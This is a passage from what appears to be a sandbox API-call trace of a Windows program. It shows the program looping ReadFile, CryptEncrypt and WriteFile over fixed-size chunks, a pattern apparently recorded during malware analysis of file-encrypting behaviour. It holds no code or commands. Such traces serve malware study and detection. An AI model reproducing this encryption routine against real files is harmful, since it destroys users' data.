returned 1 [0267.732] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.733] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.733] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.733] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.733] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.734] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.734] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.734] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.734] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.734] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.734] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.735] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.735] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.735] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.735] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.735] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.735] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.736] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.736] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.736] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.736] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.736] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.736] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.737] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.737] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.738] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.738] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.739] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.739] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.739] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.739] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 